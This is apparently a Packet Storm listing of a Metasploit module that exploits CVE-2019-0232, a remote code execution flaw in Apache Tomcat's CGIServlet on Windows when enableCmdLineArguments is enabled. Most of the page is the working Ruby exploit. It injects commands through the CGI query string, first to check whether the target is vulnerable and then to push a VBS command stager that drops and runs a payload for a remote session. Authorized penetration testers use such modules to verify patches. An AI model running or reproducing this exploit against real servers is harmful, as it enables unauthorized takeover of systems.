exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Apache Tomcat CGIServlet enableCmdLineArguments Remote Code Execution

Apache Tomcat CGIServlet enableCmdLineArguments Remote Code Execution
Posted Jul 2, 2019
Authored by sinn3r, Yakov Shafranovich | Site metasploit.com

This Metasploit module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the enableCmdLineArguments setting is set to true, a remote user can abuse this to execute system commands, and gain remote code execution.

tags | exploit, remote, code execution
advisories | CVE-2019-0232
SHA-256 | 4ccfaf072a1e7c46f30c1cc2d18cee6c6a4808b75b791fdf5f86b605d61b7b79

Apache Tomcat CGIServlet enableCmdLineArguments Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info={})
super(update_info(info,
'Name' => 'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability',
'Description' => %q{
This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the
enableCmdLineArguments setting is set to true, a remote user can abuse this to execute
system commands, and gain remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Yakov Shafranovich', # Original discovery
'sinn3r' # Metasploit module
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
[ 'Apache Tomcat 9.0 or prior for Windows', { } ]
],
'References' =>
[
['CVE', '2019-0232'],
['URL', 'https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/'],
['URL', 'https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/']
],
'Notes' =>
{
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'CmdStagerFlavor' => 'vbs',
'DefaultOptions' =>
{
'RPORT' => 8080
},
'Privileged' => false,
'DisclosureDate' => 'Apr 10 2019', # Date of public advisory issued by the vendor
'DefaultTarget' => 0
))

register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to CGI script', '/'])
])

register_advanced_options(
[
OptBool.new('ForceExploit', [false, 'Override check result', false])
])

deregister_options('SRVHOST', 'SRVPORT', 'URIPATH')
end

def check
sig = Rex::Text.rand_text_alpha(10)
uri = normalize_uri(target_uri.path)
uri << "?&echo+#{sig}"

res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})

unless res
vprint_error('No Response from server')
return CheckCode::Unknown
end

if res.body.include?(sig)
return CheckCode::Vulnerable
end

CheckCode::Safe
end

def execute_command(cmd, opts={})
# Our command stager assumes we have access to environment variables.
# We don't necessarily have that, so we have to modify cscript to a full path.
cmd.gsub!('cscript', 'C:\\Windows\\System32\\cscript.exe')

uri = normalize_uri(target_uri.path)
uri << "?&#{CGI.escape(cmd)}"

res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})

unless res
fail_with(Failure::Unreachable, 'No response from server')
end

unless res.code == 200
fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
end
end

# it seems we don't really have a way to retrieve the filenames from the VBS command stager,
# so we need to rely on the user to cleanup the files.
def on_new_session(cli)
print_warning('Make sure to manually cleanup the exe generated by the exploit')
super
end

def exploit
print_status("Checking if #{rhost} is vulnerable")
unless check == CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
end

print_warning('Target does not appear to be vulnerable.')
end

print_status("#{rhost} seems vulnerable, what a good day.")
execute_cmdstager(flavor: :vbs, temp: '.', linemax: 7000)
end
end
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close